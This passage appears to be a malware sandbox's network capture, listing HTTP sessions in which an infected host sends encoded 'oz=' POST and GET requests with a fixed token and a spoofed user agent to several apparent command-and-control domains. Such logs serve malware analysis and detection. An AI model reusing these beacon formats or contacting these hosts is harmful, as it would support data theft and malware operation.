                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
Oct 4, 2024 08:12:03.843426943 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:34:52 GMT
                                                                                                                                              X-Varnish: 1110525052
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
76 | 192.168.11.20 | 49806 | 54.67.87.110 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:06.376060009 CEST | 1289 | OUT | POST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:12:06.376108885 CEST | 3867 | OUT
                                                                                                                                              Data Ascii: 6bFkdd821Ttt3K7ruEBNKVvXUaASDAXpSL1U4RYi/3m8fK+p7R/l9xJICdkq1h1NNz5AW3TM+QYRT2Ky0nSq1jIs1a2ml/3x2h0ch8HUw+0vvJ6FwW1ISvdTyUK8JHqBuVXE8hcDIY54rTxfccaRYyyBbI59ec3Kwvd+2UmgldEua9dfIQn/pZumElQei9JlFoJj5xlaAer1tJXSXbzBXVHZl5q7gtk1ptbXv3BBSxm9rpJctyj
Oct 4, 2024 08:12:06.376157999 CEST | 2808 | OUT
                                                                                                                                              Data Ascii: +SUsKZBY8F4o3Qx/4rdUub8UIQ5AXHfzF8UWHaEgG2b4faEE2pcVcLe1bsWj4E8nsb5ee1ovnWNTORuU6kUnXycoGr0REY+5eq3aELCZIw29uHr+PlLx7aUJ0fBQ8M+PmaE+x6aXiQ1t5X8Br1wMaXypRDwVibJv84OM6oid5R7fqvZIZnZlWUsqdkdZHF2r5y/D0sjk6TQHvR0XH5ag5wpdd/6iDfToJgtTq7iZokhVNUw3KV5
Oct 4, 2024 08:12:06.530628920 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:34:54 GMT
                                                                                                                                              X-Varnish: 1110525113
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
77 | 192.168.11.20 | 49807 | 54.67.87.110 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:09.061167955 CEST | 543 | OUT | GET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:12:09.216747999 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:34:57 GMT
                                                                                                                                              X-Varnish: 1110525150
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
78 | 192.168.11.20 | 49808 | 194.58.112.174 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:14.472788095 CEST | 828 | OUT | POST /7cy1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.albero-dveri.online
                                                                                                                                              Origin: http://www.albero-dveri.online
                                                                                                                                              Referer: http://www.albero-dveri.online/7cy1/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
Oct 4, 2024 08:12:14.709954023 CEST | 1289 | IN
Oct 4, 2024 08:12:14.709995985 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:14 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port
79 | 192.168.11.20 | 49809 | 194.58.112.174 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:17.231177092 CEST | 848 | OUT | POST /7cy1/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.albero-dveri.online
Origin: http://www.albero-dveri.online
Referer: http://www.albero-dveri.online/7cy1/
Content-Length: 219
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:12:17.456372023 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 04 Oct 2024 06:12:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.11.20 | 49810 | 194.58.112.174 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:19.996772051 CEST | 1289 | OUT | POST /7cy1/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.albero-dveri.online
Origin: http://www.albero-dveri.online
Referer: http://www.albero-dveri.online/7cy1/
Content-Length: 7367
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:12:20.227200031 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 04 Oct 2024 06:12:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.11.20 | 49811 | 194.58.112.174 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:22.754941940 CEST | 554 | OUT | GET /7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.albero-dveri.online
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:12:22.981142998 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 04 Oct 2024 06:12:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.11.20 | 49812 | 38.47.207.146 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:28.294442892 CEST | 798 | OUT | POST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 7a 2f 71 4c 33 7a 30 33 6c 41 54 33 54 30 77 56 50 39 6f 41 4f 4d 65 41 63 62 48 4e 7a 68 39 45 35 71 35 32 38 76 42 78 41 75 74 7a 4b 74 36 38 74 30 53 71 43 43 50 66 34 42 71 5a 6c 72 31 64 52 54 34 2b 50 43 41 36 59 5a 67 31 34 6e 59 74 66 72 78 51 41 78 43 51 72 44 4d 59 6f 79 4e 5a 47 38 59 69 66 36 4b 50 30 2f 5a 46 31 63 35 79 62 76 52 43 44 56 55 75 6f 43 39 35 57 59 67 78 64 76 31 6e 4a 4f 41 55 38 50 5a 31 6b 76 4d 78 76 5a 48 64 55 77 58 7a 71 61 4b 78 73 38 53 4f 42 32 32 50 5a 7a 32 53 58 44 41 44 70 46 38 4b 51 33 48 4e 5a 41 3d 3d
                                                                                                                                              Data Ascii: oz=ThgGZIXTrmN3z/qL3z03lAT3T0wVP9oAOMeAcbHNzh9E5q528vBxAutzKt68t0SqCCPf4BqZlr1dRT4+PCA6YZg14nYtfrxQAxCQrDMYoyNZG8Yif6KP0/ZF1c5ybvRCDVUuoC95WYgxdv1nJOAU8PZ1kvMxvZHdUwXzqaKxs8SOB22PZz2SXDADpF8KQ3HNZA==
Oct 4, 2024 08:12:28.589133978 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:28 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
83 | 192.168.11.20 | 49813 | 38.47.207.146 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:31.122299910 CEST | 818 | OUT | POST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 5a 45 34 50 46 32 39 74 35 78 4e 4f 74 7a 53 39 36 31 6a 55 53 31 43 43 44 74 34 42 6d 5a 6c 72 78 64 52 54 6f 2b 50 7a 41 39 5a 4a 67 37 6b 6e 59 72 43 37 78 51 41 78 43 51 72 44 4a 51 6f 79 56 5a 47 49 63 69 66 66 6d 4d 33 2f 59 33 6a 4d 35 79 66 76 52 47 44 56 55 59 6f 44 67 63 57 64 6b 78 64 75 46 6e 49 62 73 54 32 50 5a 7a 70 50 4e 43 67 72 53 51 63 51 76 56 76 39 75 35 6a 75 6d 46 41 67 6e 56 45 42 43 32 55 51 63 78 74 31 46 69 53 31 47 57 45 50 4f 6a 4c 4f 39 46 38 4e 64 46 62 69 4e 64 62 2f 31 61 69 46 73 3d
                                                                                                                                              Data Ascii: oz=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzZE4PF29t5xNOtzS961jUS1CCDt4BmZlrxdRTo+PzA9ZJg7knYrC7xQAxCQrDJQoyVZGIciffmM3/Y3jM5yfvRGDVUYoDgcWdkxduFnIbsT2PZzpPNCgrSQcQvVv9u5jumFAgnVEBC2UQcxt1FiS1GWEPOjLO9F8NdFbiNdb/1aiFs=
Oct 4, 2024 08:12:31.423966885 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:31 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
84 | 192.168.11.20 | 49814 | 38.47.207.146 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:33.952368975 CEST | 1289 | OUT | POST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:12:34.256735086 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:34 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
85 | 192.168.11.20 | 49815 | 38.47.207.146 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:36.788305998 CEST | 544 | OUT | GET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:12:37.093775988 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:36 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
86 | 192.168.11.20 | 49816 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:42.221555948 CEST | 813 | OUT | POST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 72 51 58 4c 6e 58 46 45 75 59 4a 41 34 65 63 77 64 4e 2b 61 47 50 30 5a 31 4e 73 64 46 73 74 4c 52 65 64 52 63 42 44 62 38 43 72 62 41 6b 6a 75 6e 42 7a 79 48 36 47 6c 2f 70 62 6e 46 53 6b 4a 51 57 59 43 62 64 76 74 76 49 30 59 33 49 53 51 64 52 76 48 6b 79 62 34 78 49 49 79 79 4e 73 79 31 52 6b 46 6f 46 58 47 53 62 31 6f 63 33 66 70 6e 66 79 68 4b 75 58 6f 37 6c 41 4c 32 44 71 66 49 55 31 57 6d 46 31 74 44 36 58 5a 4a 65 38 6b 51 44 56 78 31 49 77 42 50 66 41 61 57 69 48 6f 55 55 58 63 59 6e 6d 6a 73 6b 64 51 37 57 56 78 4f 6a 69 31 55 67 3d 3d
                                                                                                                                              Data Ascii: oz=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==


Session ID | Source IP | Source Port | Destination IP | Destination Port
87 | 192.168.11.20 | 49817 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:44.861121893 CEST | 833 | OUT | POST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.11.20 | 49818 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:47.502202988 CEST | 2578 | OUT | POST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Data Ascii: oz= [TRUNCATED]
Oct 4, 2024 08:12:47.502250910 CEST | 5404 | OUT
                                                                                                                                              Data Ascii: QxkTW8U+yeYEZX69HiERESFWQ/R/yOjVnvUvv7t1ziWg2K9NFaJTJ233WDiHl4iJBNFMI8pbGxo+R7dKcdE9Jn+/0z/MgjDJ2BhkLZdpPGxLrSL+Tnj4xIMM6dLYF3EpIznJotHC+OJo/MlBSzJ6igaxM/7pi2wUNfg7MEjtZtFjI/0SZOcc3jZ8kyjD+GDqDuYqKmxrDASd2qsEGQ1rebqvbJyYbta3BiMj6ZfjxgMjEddXIMj


Session ID | Source IP | Source Port | Destination IP | Destination Port
89 | 192.168.11.20 | 49819 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:50.137732983 CEST | 549 | OUT | GET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
